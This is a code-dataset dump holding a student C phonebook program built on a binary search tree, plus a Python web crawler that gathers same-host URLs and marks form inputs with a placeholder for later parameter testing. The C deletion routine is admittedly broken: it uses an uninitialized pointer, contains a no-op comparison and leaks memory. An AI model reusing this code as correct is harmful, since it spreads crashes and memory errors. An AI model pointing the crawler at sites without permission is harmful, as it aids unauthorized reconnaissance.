"559f670355532351fe02502669fa77adf1fa7957", "content_id": "e0b26d425fa8a8f26c10fbe8e2b50da53919c47e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 10906, "license_type": "no_license", "max_line_length": 90, "num_lines": 357, "path": "/PhBook1.c", "repo_name": "dzulaiman/binarysearch", 
"src_encoding": "UTF-8", "text": " /* http://www.cs.bu.edu/faculty/homer/113/ */\n\n /*\n * File Name: PhBook1.c\n * Name: Asmatullah Yaree, Mohd Dzul Aiman, Nursuliza, Maryam Adinehnia\n * Assignment: 1\n * Problem: 1\n * Date: March 29, 2013\n *\n * This program utilizes a binary search tree to build and maintain\n * a small PhoneBook database. The serial numbers will serve as the\n * search keys for the binary search tree. Data will initially be\n * read from a file, and the user will be prompted with options\n * regarding what to do with the phonebook.\n */\n #include <stdio.h>\n #include <stdlib.h>\n #include \"Ph1tree.h\"\n //#include \"Ph1tree.c\"\n \n #define FNAME_MAX 50 /* maximum filename length */\n \n /*\n * TYPE DEFINITIONS\n */\n typedef treeElementT dataT;\n typedef treeKeyT serialNumT;\n \n /*\n * FUNCTION PROTOTYPES\n */\n void PrintInfoMainMenu(void);\n void InfoReadFromFile(treeADT tree);\n void InfoAdd(treeADT tree);\n void InfoUpdate(treeADT tree);\n void InfoDelete(treeADT tree);\n void InfoFind(treeADT tree);\n void InfoPrint(treeADT tree);\n \n /*\n * BEGIN MAIN PROGRAM\n */\n int main(void)\n {\n treeADT tree; /* tree holding the phonebook information */\n \n char choice[2]; /* main menu choice */\n \n /* create a tree to hold the info. */\n tree = TreeCreate();\n \n InfoReadFromFile(tree); /* read info from file */\n PrintInfoMainMenu(); /* print main menu */\n printf(\"Choice> \");\n scanf(\"%s\", choice);\n \n while (choice[0] != 'q')\n { \n switch (choice[0])\n { \n case 'a':\n InfoAdd(tree);\n break;\n case 'd':\n InfoDelete(tree);\n break;\n case 'f':\n InfoFind(tree);\n break;\n case 'u':\n InfoUpdate(tree);\n break;\n case 'p':\n InfoPrint(tree);\n break;\n default:\n printf(\"Error!! Invalid Selection.\\n\");\n break;\n }\n \n printf(\"\\n\\nPress Enter for Main Menu\\n\");\n getchar(); getchar();\n PrintInfoMainMenu(); /* print main menu */\n printf(\"\\nChoice> \"); /* prompts for next selection */\n scanf(\"%s\", choice); /* scans in choice */\n }\n \n printf(\"Bye! 
Thanks for using PhoneBook.\\n\"); /* Goodbye message */ \n \n TreeDestroy(tree);\n \n return 0;\n }\n /*\n * END MAIN PROGRAM\n */\n \n /*\n * Function: PrintInfoMainMenu\n * Usage: PrintInfoMainMenu();\n * ------------------------------\n * This procedure prints out the main menu options.\n */\n void PrintInfoMainMenu(void)\n {\n printf(\"--------- PhoneBook Data Inventory System V1.0--------\\n\");\t\n printf(\"Please choose one of the following operations by typing its\\n\");\n printf(\"letter and then pressing <Return>:\\n\\n\");\n printf(\" a) Add an User info to the database.\\n\");\n printf(\" d) Delete user from the database.\\n\");\n printf(\" f) Find user in the database.\\n\");\n printf(\" u) Update user info in the database.\\n\");\n printf(\" p) Print user database.\\n\");\n printf(\" q) Quit inventory.\\n\\n\");\n }\n \n /*\n * Function: InfoReadFromFile\n * Usage: InfoReadFromFile(tree);\n * ---------------------------------\n * This procedure reads in user data file and adds\n * the user data to a binary search tree.\n */\n void InfoReadFromFile(treeADT tree)\n {\n dataT data; /* data information */\n \n /* name of phonebook data file to be opened */\n //char filename[FNAME_MAX+1] = \"/home/yaree/phone/phonebook.in\";\n char filename[FNAME_MAX+1] = \"phonebook_50_start24.txt\";\n \n FILE *ifp; /* input file pointer */\n \n printf(\"Initial user data read from file:\\n\");\n printf(\"\\\"%s\\\"\\n\\n\",filename);\n \n /* attempt to open user data file for reading */\n ifp = fopen(filename, \"r\");\n \n /* print error message if unable to open data file */\n if (ifp == NULL)\n {\n printf(\"Error!! Unable to open phonebook database file.\\n\");\n exit(1); /* exit, returning error code */\n }\n else\n {\n /* if file successfully opened, loop to read in user data */\n while (fscanf(ifp,\"%d %s %d\", &data.key, data.value.name, &data.value.number) == 3)\n TreeAdd(tree,data); /* add user to tree */\n \n fclose(ifp); /* close input file */\n }\n }\n \n /*\n * Function: InfoAdd\n * Usage: InfoAdd(tree);\n * ------------------------\n * This procedure prompts a user for a serial number, name, and Telephone Number \n * and adds the user information to the binary search tree.\n */\n void InfoAdd(treeADT tree)\n {\n dataT data; /* user information */\n \n printf(\"Please enter the serial number: \");\n while (scanf(\"%d\",&data.key) == 0 || (data.key < 1) || (data.key > 100000))\n {\n printf(\"Error!! Serial number is invalid.\\n\");\n printf(\"Serial number must be an integer between 1 and 100000.\\n\");\n printf(\"Please enter the Serial number: \");\n }\n \n printf(\"Please enter the name: \");\n scanf(\"%s\",data.value.name);\n \n printf(\"Please enter the telephone number \");\n while (scanf(\"%d\",&data.value.number ) <= 0)\n {\n printf(\"Error!! Telephone Number is invalid.\\n\");\n printf(\"telephone number must be an integer.\\n\");\n printf(\"Please enter the telephone number: \");\n }\n \n TreeAdd(tree,data); /* add user data to tree */\n }\n \n /*\n * Function: InfoUpdate\n * Usage: InfoUpdate(tree);\n * ------------------------\n * This procedure prompts a user for a serial number, name, and Telephone Number \n * and updates the user information to the binary search tree.\n */\n void InfoUpdate(treeADT tree)\n {\n dataT data, /* user information */\n *acctP;\n printf(\"Please enter the serial number: \");\n while (scanf(\"%d\",&data.key) == 0 || (data.key < 1) || (data.key > 100000))\n {\n printf(\"Error!! 
Serial number is invalid.\\n\");\n printf(\"Serial number must be an integer between 1 and 100000.\\n\");\n printf(\"Please enter the Serial number: \");\n }\n \n /* check if user info exists in tree */\n acctP = TreeFind(tree,data.key);\n PrintElement(*acctP,stdout);\n \n printf(\"\\nPlease enter the name: \");\n scanf(\"%s\",data.value.name);\n \n printf(\"Please enter the telephone number \");\n while (scanf(\"%d\",&data.value.number ) <= 0)\n {\n printf(\"Error!! Telephone Number is invalid.\\n\");\n printf(\"telephone number must be an integer.\\n\");\n printf(\"Please enter the telephone number: \");\n }\n \n TreeAdd(tree,data); /* add user data to tree */\n }\n \n /*\n * Function: InfoDelete\n * Usage: InfoDelete(tree);\n * ---------------------------\n * This procedure prompts the user for an user info. It then\n * searches for the serial number in the tree. If it is found, it\n * will remove the user information from the tree and print it.\n * If not, it will just print an error message.\n */\n void InfoDelete(treeADT tree)\n {\n serialNumT serial_num; /* serial number */\n dataT data, /* user information */\n *acctP; /* pointer to a user info */\n \n printf(\"Enter serial number to be deleted: \");\n while (scanf(\"%d\",&serial_num) == 0 || (serial_num < 1) || (serial_num > 100000))\n {\n printf(\"Error!! Serial number is invalid.\\n\");\n printf(\"Serial Number must be an integer between 1 and 100000.\\n\");\n printf(\"Enter serial number of the user to be deleted: \");\n }\n \n /* check if user info exists in tree */\n acctP = TreeFind(tree,serial_num);\n \n /* if user info does not exist, print an error message */\n if (acctP == NULL)\n printf(\"Error!! Serial number \\\"%d\\\" does not exist in database.\\n\", serial_num);\n else\n {\n /* if user exists, delete it from the tree and print its information */\n data = TreeDelete(tree,serial_num); /* delete data from tree */\n printf(\"The following user information was deleted:\\n\");\n PrintElement(data,stdout); \n }\n }\n \n /*\n * Function: InfoFind\n * Usage: InfoFind(tree);\n * -------------------------\n * This procedure prompts the user for an serial number and\n * attempts to find it in the tree. If it is found, it will\n * print out the phonebook information. If not, it will just\n * print an error message.\n */\n void InfoFind(treeADT tree)\n {\n serialNumT serial_num; /* serial number */\n dataT *dataP; /* pointer to a user info */\n \n printf(\"Enter the serial number to be found: \");\n while (scanf(\"%d\",&serial_num) == 0 || (serial_num < 1) || (serial_num > 100000))\n {\n printf(\"Error!! Serial number is invalid.\\n\");\n printf(\"Serial number must be an integer between 1 and 100000.\\n\");\n printf(\"Enter the serial number to be found: \");\n }\n \n /* check if data exists in tree */\n dataP = TreeFind(tree,serial_num);\n \n if (dataP == NULL)\n printf(\"Error!! 
Serial number \\\"%d\\\" not found.\\n\", serial_num);\n else\n PrintElement(*dataP,stdout);\n }\n \n /*\n * Function: InfoPrint\n * Usage: InfoPrint(tree);\n * --------------------------\n * This procedure prompts the user whether to print the phonebook\n * database to the screen or to a file and then prints out each\n * user information using preorder traversal of the tree.\n */\n void InfoPrint(treeADT tree)\n {\n char choice[5]; /* string holding user's choice */\n \n FILE *ofp; /* output file pointer */\n \n printf(\"Please choose where the user information should\\n\");\n printf(\"be printed and hit <Return>:\\n\\n\");\n printf(\" s) Print to screen\\n\");\n printf(\" f) Print to file \\\"phonebook.out\\\"\\n\");\n printf(\" r) Return to Main Menu prompt.\\n\\n\");\n printf(\"Print Choice> \");\n scanf(\"%s\",choice);\n \n while (choice[0] != 'r')\n {\n switch (choice[0])\n {\n case 's':\n TreePrint(tree,stdout); /* print to the screen */\n return; /* exit function */\n case 'f':\n ofp = fopen(\"phonebook.out\", \"w\"); /* attempt to open file for writing */\n TreePrint(tree,ofp); /* print out tree elements to file */\n fclose(ofp); /* close output file */\n return; /* exit function */\n default:\n printf(\"Invalid selection.\\n\");\n break;\n }\n printf(\"\\nPrint Choice> \");\n scanf(\"%s\",choice);\n }\n }\n /*\n * Printing to \"phonebook.out\" should have been done automatically\n * as last thing program does. --TF\n */\n \n /*\n * Function: PrintElement\n * ----------------------\n * This procedure prints out the elements of the tree.\n */\n void PrintElement(dataT data, FILE *outfileP)\n { \n\n fprintf(outfileP,\"|Serial: %d\\t\", data.key);\n fprintf(outfileP,\"|Name: %s\\t\", data.value.name);\n fprintf(outfileP,\"|Telephone: %d\\t\\n\", data.value.number);\n \n /*fprintf(outfileP,\"Serial Number: %d\\n\", data.key);\n fprintf(outfileP,\"User Name: %s\\n\", data.value.name);\n fprintf(outfileP,\"Telephone Number: %d\\n\\n\", data.value.number);*/\n }\n \n" }, { "alpha_fraction": 0.5497402548789978, "alphanum_fraction": 0.5505099296569824, "avg_line_length": 31.617155075073242, "blob_id": "3faae8a519a896c34ce3fb92f7f40029c36a42a7", "content_id": "41aeabe193c5911359354ba19a6e878ca2743fe1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 15591, "license_type": "no_license", "max_line_length": 88, "num_lines": 478, "path": "/Ph1tree.c", "repo_name": "dzulaiman/binarysearch", "src_encoding": "UTF-8", "text": "/*\n * File Name: Ph1tree.c\n * Name: Asmatullah Yaree, Mohd Dzul Aiman, Nursuliza, Maryam Adinehnia\n * Assignment: 1\n * Problem: 1\n * Date: March April, 2013\n *\n * This is the implementation file for the tree module. 
It\n * contains the functions needed to perform tree operations.\n */\n \n #include <stdio.h>\n #include <stdlib.h>\n #include \"Ph1tree.h\"\n \n \n /* tree node data structure */\n typedef struct treeNodeTag {\n treeElementT element; /* tree element */\n struct treeNodeTag *left; /* left tree link */\n struct treeNodeTag *right; /* right tree link */\n } treeNodeT;\n \n /* treeCDT data structure */\n typedef struct treeCDT {\n treeNodeT *root;\n } treeCDT;\n \n /*\n * HELPER FUNCTION PROTOTYPES\n */\n static void RecTreePrint(treeNodeT *root, FILE *outfileP);\n static void RecTreeDestroy(treeNodeT *root);\n static treeNodeT *FindCurrentNode(treeADT tree, treeKeyT key);\n static treeNodeT *FindParentNode(treeADT tree, treeKeyT key);\n static treeNodeT *FindMaxNode(treeNodeT *root);\n \n /*\n * Function: TreeCreate\n * --------------------\n * This procedure initializes an empty tree by setting \n * the pointer to the root of the tree equal to NULL.\n */\n treeADT TreeCreate(void)\n {\n treeADT tree; /* pointer to a treeCDT */\n \n tree = (treeADT)malloc(sizeof(treeCDT));\n \n /* if allocation fails, print an error message and exit */\n if (tree == NULL) \n {\n fprintf(stderr,\"Insufficient memory for new tree.\\n\");\n exit(1); /* exit, returning error code. */\n }\n \n tree->root = NULL; /* initialize root pointer of the tree */\n return tree;\n }\n \n /*\n * Function: TreeDestroy\n * ---------------------\n * This procedure calls a recursive function to free the memory\n * used up by the tree nodes and resets the root pointer of the\n * tree to NULL.\n */\n void TreeDestroy(treeADT tree)\n {\n RecTreeDestroy(tree->root); /* start at root of tree */\n tree->root = NULL; /* reset root pointer to NULL */\n \n /* free structure which holds information about tree */\n free(tree);\n }\n \n /*\n * Function: RecTreeDestroy\n * ------------------------\n * This procedure uses a postorder traversal of the tree\n * and recursively calls itself to free the tree nodes in\n * a postorder manner so that links to other nodes are not\n * lost if the root is deleted.\n */\n static void RecTreeDestroy(treeNodeT *root)\n {\n if (root == NULL) /* base case to stop recursing */\n return;\n else\n {\n RecTreeDestroy(root->left); /* traverse left */\n RecTreeDestroy(root->right); /* traverse right */\n free(root); /* deallocate memory */\n }\n }\n \n /*\n * Function: TreeAdd\n * -----------------\n * This procedure adds a new node to a tree to the \n * bottom of the tree. If the element is already in \n * the tree, it just adds the element.\n */\n void TreeAdd(treeADT tree, treeElementT element)\n {\n treeNodeT *new_tree_node, /* new tree node */\n *currentP, /* pointer to the current tree node */\n *parentP; /* pointer to parent of current node */\n\n \n /* check to see if element's key is already in the tree */\n currentP = FindCurrentNode(tree,element.key);\n \n /* if element's key is already in the tree, just */\n /* add the new element and exit the function */\n if (currentP != NULL)\n {\n printf(\"\\nUnfortunately, serial number already exist. 
Nothing was add.\");\n //currentP->element = element;\n return; /* exit the function */\n }\n \n /* if the element's key is not already in the tree, search for */\n /* an empty branch onto which the new leaf node will be added */\n \n parentP = NULL;\n currentP = tree->root; /* start at root of tree */\n \n /* search for empty branch to add an element */\n while (currentP != NULL)\n {\n parentP = currentP;\n if (element.key == currentP->element.key)\n break;\n else if (element.key < currentP->element.key)\n currentP = currentP->left;\n else if (element.key > currentP->element.key)\n currentP = currentP->right;\n }\n \n /* attempt to allocate space in memory for a new tree node */\n new_tree_node = (treeNodeT *) malloc(sizeof(treeNodeT));\n \n /* print error message if allocation fails */\n if (new_tree_node == NULL)\n {\n fprintf(stderr,\"Insufficient memory to add a new tree node.\\n\");\n TreeDestroy(tree);\n exit(1);\n }\n else\n {\n /* add the element to the new tree node */\n new_tree_node->element = element;\n new_tree_node->left = NULL;\n new_tree_node->right = NULL;\n \n /* connect the new tree node with the rest of the tree */\n /* depending on whether or not it is the root or it is */\n /* less than or greater than the root */\n if (parentP == NULL)\n tree->root = new_tree_node;\n else if (new_tree_node->element.key < parentP->element.key)\n parentP->left = new_tree_node;\n else if (new_tree_node->element.key > parentP->element.key)\n parentP->right = new_tree_node;\n }\n }\n \n /*\n * Function: TreeDelete\n * --------------------\n * This procedure deletes an element from a tree, depending\n * on whether the element is a leaf, has only one connecting\n * branch, or is a root node.\n */\n treeElementT TreeDelete(treeADT tree, treeKeyT key)\n {\n treeNodeT *currentP, /* pointer to node to be deleted */\n *parentP, /* pointer to parent of node to be deleted */\n *max_nodeP, /* pointer to node with largest key */\n *max_node_parP, /* pointer to parent of node with largest key */\n *temp_node;\n \n treeElementT deleted; /* element that is deleted from the tree */\n \n if (tree->root == NULL)\n {\n printf(\"Error!! There are no tree nodes to be deleted.\\n\");\n TreeDestroy(tree); /* deallocate memory used by tree */\n exit(1); /* exit program, returning error code */\n }\n else \n {\n /* find the node to be deleted */\n currentP = FindCurrentNode(tree,key);\n if (currentP == NULL)\n {\n printf(\"Error!! 
The key to be deleted does not exist in the tree.\\n\");\n TreeDestroy(tree); /* deallocate memory used by tree */\n exit(1); /* exit program, returning error code */\n }\n else \n {\n /* if the node exists, find it's parent node */\n parentP = FindParentNode(tree,key);\n \n /* copy deleted node's element into a variable to return */\n deleted = currentP->element;\n \n /* case for deletion if node is a leaf */\n if ((currentP->left == NULL) && (currentP->right == NULL))\n {\n\t\t if(parentP==NULL)\n tree->root=NULL;\n\t else\n if(currentP==parentP->left)\n parentP->left=NULL;\n\t\t else\n\t\t parentP->right=NULL;\n\t }\n /* set left and right pointers of parent node to NULL */\n /* if (parentP->left == currentP)\n parentP->left = NULL;\n else if (parentP->right == currentP)\n parentP->right = NULL;\n }*/\n \n\t\n\n\t/* case for deletion if node has a left branch and no right branch */\n else if ((currentP->left != NULL) && (currentP->right == NULL))\n {\n\t\t\n if (parentP->left == currentP)\n parentP->left = currentP->left;\n else if (parentP->right == currentP)\n parentP->right = currentP->left;\n }\n\n /* case for deletion if node has a right branch and no left branch */\n else if ((currentP->right != NULL) && (currentP->left == NULL))\n {\n if (parentP->left == currentP)\n parentP->left = currentP->right;\n else if (parentP->right == currentP)\n parentP->right = currentP->right;\n }\n /* case for deletion if node has two branches */\n else if ((currentP->left != NULL) && (currentP->right != NULL))\n {\n /* this type of deletion involves finding the largest key node in the */\n /* left subtree and basically swaps the element of the largest node */\n /* with the node to be deleted, relinks the tree, and frees the max node */\n \n /* find largest key node and its parent in left subtree */\n max_nodeP = FindMaxNode(currentP->left);\n max_node_parP = FindParentNode(tree,max_nodeP->element.key);\n \n /* if maximum key node is a leaf and it's parent is not equal */\n /* to current, then set the left and right pointers of the parent */\n /* to NULL, else just have the parent's left pointer point to NULL */\n /* so that the right subtree of the deleted node is not lost. 
*/\n \n\n\n\t\t/* The deletion code below is not right */\n\n\n /* Dzul's refine */\n \n if ((max_node_parP->right == max_nodeP) && (max_nodeP->left == NULL))\n {\n /* swap max node element into deleted node */\n currentP->element = max_nodeP->element; \n /* have current point to max to free the maximum key node */\n currentP = max_nodeP; \n \n max_node_parP->right = NULL; \n }\n \n else if ((max_node_parP->right == max_nodeP) && (max_nodeP->left != NULL))\n {\n temp_node->right = max_nodeP->left;\n \n /* swap max node element into deleted node */\n currentP->element = max_nodeP->element; \n /* have current point to max to free the maximum key node */\n currentP = max_nodeP; \n \n max_node_parP->right = temp_node;\n \n }\n \n else if ((max_node_parP->left == max_nodeP) && (max_nodeP->left == NULL))\n {\n /* swap max node element into deleted node */\n currentP->element = max_nodeP->element; \n /* have current point to max to free the maximum key node */\n currentP = max_nodeP; \n max_node_parP->left = NULL; \n }\n \n else if ((max_node_parP->left == max_nodeP) && (max_nodeP->left != NULL))\n {\n temp_node = max_nodeP->left;\n \n /* swap max node element into deleted node */\n currentP->element = max_nodeP->element; \n /* have current point to max to free the maximum key node */\n currentP = max_nodeP; \n \n max_node_parP->left = temp_node;\n max_nodeP == NULL; \n }\n \n /*\n if ((max_nodeP->left == NULL) && (max_nodeP->right == NULL))\n { \n\n if (max_node_parP != currentP)\n {\n max_node_parP->left = NULL;\n max_node_parP->right = NULL;\n \n\t\t\n }\n else \n max_node_parP->left = NULL;\n } \n else\n max_node_parP->right = NULL;\n \n /* swap max node element into deleted node */\n /*currentP->element = max_nodeP->element; */\n /* have current point to max to free the maximum key node */\n /*currentP = max_nodeP; */\n } \n }\n }\n //free(max_nodeP); /* deallocate memory of current node */\n return deleted;\n }\n \n /*\n * Function: TreeFind\n * ------------------\n * This procedure takes in a key and searches the tree for an\n * element with that key. If it finds an element with the key,\n * it returns a pointer to that element. If not, the function\n * will return NULL.\n */\n treeElementT *TreeFind(treeADT tree, treeKeyT key)\n {\n treeNodeT *currentP; /* pointer to the current tree node */\n \n currentP = tree->root; /* set current to the root of the tree */\n \n /* search for the key */\n while (currentP != NULL)\n {\n if (key == currentP->element.key)\n return &currentP->element; /* return pointer to element if key's match */\n /* move current left or right if keys don't match */\n else if (key < currentP->element.key)\n currentP = currentP->left;\n else if (key > currentP->element.key)\n currentP = currentP->right; \n }\n return NULL;\n }\n \n /*\n * Function: TreePrint\n * -------------------\n * This procedure checks if the tree is empty. If empty, an\n * error message is printed, otherwise RecTreePrint is called\n * to print the elements of the tree in preorder.\n */\n void TreePrint(treeADT tree, FILE *outfileP)\n {\n if (tree->root == NULL)\n printf(\"Error!! 
There are no elements in the tree to be printed.\\n\\n\");\n /* ^^ Not an error condition -- TF */\n else\n RecTreePrint(tree->root,outfileP);\n }\n \n /*\n * Function: RecTreePrint\n * ----------------------\n * This procedure is a recursive function which prints out\n * elements of a tree in preorder.\n */\n static void RecTreePrint(treeNodeT *root, FILE *outfileP)\n {\n if (root == NULL) /* base case to stop recursing */\n return;\n else\n {\n PrintElement(root->element,outfileP); /* print root element */\n RecTreePrint(root->left,outfileP); /* traverse left node */\n RecTreePrint(root->right,outfileP); /* traverse right node */\n }\n }\n \n /*\n * Function: FindCurrentNode\n * -------------------------\n * This is a helper function which returns\n * a pointer to a key's node.\n */\n static treeNodeT *FindCurrentNode(treeADT tree, treeKeyT key)\n {\n treeNodeT *currentP; /* pointer to the current tree node */\n \n currentP = tree->root; /* set current to the root node of the tree */\n \n while (currentP != NULL)\n {\n if (key == currentP->element.key)\n return currentP;\n /* move current left or right accordingly */\n else if (key < currentP->element.key)\n currentP = currentP->left;\n else if (key > currentP->element.key)\n currentP = currentP->right; \n }\n return NULL;\n }\n \n /*\n * Function: FindParentNode\n * ------------------------\n * This is a helper function which returns\n * a pointer to the parent of a key's node.\n */\n static treeNodeT *FindParentNode(treeADT tree, treeKeyT key)\n {\n treeNodeT *currentP, /* pointer to the current tree node */\n *parentP; /* pointer to the parent of the current node */\n \n parentP = NULL;\n currentP = tree->root; /* set current to the root node of the tree */\n \n while (currentP != NULL)\n {\n if (key == currentP->element.key)\n return parentP;\n /* increment parent and current pointers accordingly */\n else if (key < currentP->element.key)\n {\n parentP = currentP;\n currentP = currentP->left;\n }\n else if (key > currentP->element.key)\n {\n parentP = currentP;\n currentP = currentP->right; \n }\n }\n return NULL;\n }\n \n /*\n * Function: FindMaxNode\n * ---------------------\n * This is a helper function which returns a \n * pointer to the largest key node in a tree.\n */ \n static treeNodeT *FindMaxNode(treeNodeT *root)\n {\n if (root != NULL)\n while (root->right != NULL)\n root = root->right;\n \n return root;\n }\n" } ]
5
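The Ph1tree.c file in the binarysearch record above flags its own two-child deletion branch as "not right". The textbook fix is to copy the in-order predecessor (the maximum of the left subtree) into the node being deleted and then delete that predecessor, which has at most one child. A minimal recursive sketch of that idea, written in Python rather than the repository's C, with illustrative names that do not come from the repo:

```python
class Node:
    def __init__(self, key, value=None):
        self.key = key
        self.value = value
        self.left = None
        self.right = None

def bst_delete(root, key):
    """Delete `key` from the subtree rooted at `root`; return the new subtree root."""
    if root is None:
        return None
    if key < root.key:
        root.left = bst_delete(root.left, key)
    elif key > root.key:
        root.right = bst_delete(root.right, key)
    else:
        # Zero or one child: splice the node out.
        if root.left is None:
            return root.right
        if root.right is None:
            return root.left
        # Two children: copy the in-order predecessor (max of the left
        # subtree) into this node, then delete that predecessor, which
        # by construction has no right child.
        pred = root.left
        while pred.right is not None:
            pred = pred.right
        root.key, root.value = pred.key, pred.value
        root.left = bst_delete(root.left, pred.key)
    return root
```

The recursive formulation sidesteps the parent-pointer and max-node bookkeeping that the iterative C version struggles with.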
teuthemonsoon/url_collection
https://github.com/teuthemonsoon/url_collection
ecc1bbcf92f1c412ebf2e5442195615624e338ad
a424ec7a0f0dbac0b57eaaf5b502478db09c8845
63a6f47d06ca8d698e115fbd79c521e784df0dfb
refs/heads/master
2020-03-14T07:07:39.078545
2018-05-02T17:42:59
2018-05-02T17:42:59
131,497,404
2
0
null
null
null
null
null
[ { "alpha_fraction": 0.564311146736145, "alphanum_fraction": 0.5721911787986755, "avg_line_length": 40.85638427734375, "blob_id": "f6e23c018e8804bba79fcf965d5b13dd08cb3749", "content_id": "dfc9c476d9508d575892854a38bfb1c10abe5b75", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8266, "license_type": "no_license", "max_line_length": 157, "num_lines": 188, "path": "/sanitized_url_collection.py", "repo_name": "teuthemonsoon/url_collection", "src_encoding": "GB18030", "text": "# encoding=utf-8\nimport requests\nfrom bs4 import BeautifulSoup\nimport re,urlparse,os\nimport sys\n\nINPUT_SIGN=\"{{__INPUT__}}\"\nheaders={\"User-Agent\":\"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\",\n \"Accept\":\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\",\n \"Accept-Language\":\"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3\",\n \"Accept-Encoding\":\"\"}\nREWRITE_TYPE=[\"normal\",\"path\"]\n\nclass crawler:\n def __init__(self,url,deepest=5): #采用基于广度的搜索算法,默认规定深度最大值为5\n self.host=url\n self.url_rewrite_type=self.url_rewrite_type()\n self.list_opt=list_opt()\n self.deepest=deepest\n self.list_opt.add_url_to_unvisited(url)\n self.url_count_at_one_depth = 1\n self.depth=1\n\n def url_rewrite_type(self):\n return REWRITE_TYPE[0] #todo:判断urlrewrite模式\n # 当前默认为普通模式\n\n def crawl(self):\n while self.depth<=self.deepest and self.list_opt.count_unvisited() > 0:\n# print self.list_opt.get_unvisted()\n return_html=self.request(self.list_opt.unvisited[0])\n if return_html == False:\n continue\n urllist=self.graburl(return_html)\n for url in urllist:\n query_string = urlparse.urlparse(url).query\n query_args = dict([(k, v[0]) for k, v in urlparse.parse_qs(query_string).items()]) # 得到所有的query值然后转为dict\n query_path = urlparse.urlparse(url).path\n\n if (not self.exists_or_similar(url)):\n self.list_opt.unvisited.append(url)\n self.list_opt.visited_url_args_map.setdefault(query_path, []).append(query_args)\n # {'path1': [{'param2': 'aaa', 'param1': 'www'}, {'param2': 'bbb', 'param1': 'www'}]}\n if self.url_count_at_one_depth==0:\n self.depth+=1\n self.url_count_at_one_depth+=len(urllist)\n return self.list_opt.get_visited()\n\n def request(self,url):\n req=requests.session()\n print \"requesting to \"+url\n try:\n return_html=req.get(url,headers=headers,timeout=4,allow_redirects=False).content\n except requests.exceptions.Timeout or requests.exceptions.ConnectionError:\n print \"request to \"+url+\" failed..retrying...\"\n for i in xrange(1,2):\n retry=requests.get(url,headers,timeout=3,allow_redirects=False)\n if retry.status_code:\n return_html=retry.content\n break\n return False\n except Exception:\n print \"requests unknown error,probobly network error or your ip has been banned.\"\n return False\n self.url_count_at_one_depth-=1\n self.list_opt.unvisited.remove(url)\n self.list_opt.visited.append(url)\n self.list_opt.current_url=url\n return return_html\n\n def graburl(self,html):\n urllist = []\n soup=BeautifulSoup(html,\"lxml\")\n adomlist = soup.findAll(\"a\", {\"href\": re.compile(\".*\")})\n formdomlist=soup.findAll(\"form\",{\"action\":re.compile(\".*\")})\n\n for form in formdomlist:\n parsed_path = self.parse_form_path(form.attrs[\"action\"])\n if parsed_path == False:\n continue\n if (not form.attrs.has_key(\"method\")) or form.attrs[\"method\"].lower()==\"get\":#只取method为get的表单\n inputlist=form.select(\"input\")\n formGeneratedUrl=parsed_path+\"?\"\n for singleinput in inputlist:\n if 
singleinput.attrs.has_key(\"name\"):\n if singleinput.attrs.has_key(\"value\"):\n if singleinput.attrs.has_key(\"type\") and singleinput.attrs[\"type\"].lower()==\"hidden\":\n formGeneratedUrl+= singleinput.attrs[\"name\"]+\"=\"+singleinput.attrs[\"value\"]+\"&\"\n else:\n formGeneratedUrl += singleinput.attrs[\"name\"]+\"=\"+INPUT_SIGN+\"&\" #将给正常访问用户可控的input字段标上INPUT_SIGN\n formGeneratedUrl=formGeneratedUrl[:-1]\n else:\n formGeneratedUrl=self.parse_form_path(form.attrs[\"action\"])\n urllist.append(formGeneratedUrl)\n\n for i in adomlist:\n url = self.evaluate_and_parse_url(i.attrs[\"href\"])\n if url:\n urllist.append(url)\n return urllist\n\n def exists_or_similar(self,url):\n #判断url是否已经在已访问列表或未访问列表存在\n if url in self.list_opt.get_unvisted() or url in self.list_opt.get_visited():\n return True\n else:\n if self.url_rewrite_type == \"normal\":\n query_string=urlparse.urlparse(url).query\n if query_string=='':\n return False\n query_path=urlparse.urlparse(url).path\n query_raw_args=urlparse.parse_qs(query_string)\n query_args = dict([(k, v[0]) for k, v in query_raw_args.items()])\n same_path_args=self.list_opt.visited_url_args_map.get(query_path)\n if same_path_args==[{}] or same_path_args==None :#没有相同路径下的参数集\n return False\n same_path_keys_list=[]\n [same_path_keys_list.append(one.keys()) for one in same_path_args]\n for same_path_key in same_path_keys_list:\n if set(query_args.keys()) == set(same_path_key):#参数是否完全一致,若一致,则检查是否已有同类型的url\n for query_key, query_value in query_args.items():\n value_of_same_key = [single.get(query_key) for single in same_path_args if single.get(query_key) != None]#拿出所有带有相同key的非None的value\n if len(list(set(value_of_same_key)))>=5:#若相同的参数在已访问列表中有超过5个以上不同的值,则认为相似\n return True\n return False\n\n\n def evaluate_and_parse_url(self,url):\n if self.url_belong_to_host(url):\n if urlparse.urlparse(url).scheme == '':\n url=urlparse.urlparse(self.host).scheme+\":\"+url\n return url\n elif not re.match(r\"^(\\S+):\", url):#排除伪协议及外部网站\n return urlparse.urljoin(self.host,url)\n else :return False\n\n def parse_form_path(self,formaction):\n #以//为开头的form action值 表示http/https\n if formaction.startswith(\"//\"):\n schema=urlparse.urlparse(self.host)[0]\n url=schema+\":\"+formaction\n if self.url_belong_to_host(url):\n return url\n else:return False\n #以/为起始的form action值 表示在网站根目录\n elif formaction.startswith(\"/\"):\n return urlparse.urljoin(self.host,formaction)\n #判断类似index.php的form action值\n else:\n parselist=urlparse.urlparse(self.list_opt.get_current_url())\n parsed_path=parselist.path\n if parselist.path.endswith(\"/\"):\n parsed_path=parselist.path[:-1]\n path=os.path.split(parselist.path)[0]\n return urlparse.urljoin(self.host,path,formaction)\n\n def url_belong_to_host(self,url):\n parsed_list=urlparse.urlparse(url)\n if parsed_list.netloc==urlparse.urlparse(self.host).netloc:\n return True\n else:return False\n\n\nclass list_opt:\n def __init__(self):\n self.visited = []\n self.unvisited = []\n self.current_url=\"\"\n self.visited_url_args_map = {}\n\n def add_url_to_unvisited(self,url):\n self.unvisited.append(url)\n def add_url_to_visited(self,url):\n self.visited.append(url)\n def get_unvisted(self):\n return self.unvisited\n def count_unvisited(self):\n return len(self.unvisited)\n def get_visited(self):\n return self.visited\n def get_current_url(self):\n return self.current_url\n\n\nif __name__ ==\"__main__\":\n host=sys.argv[1]\n c=crawler(host)\n print 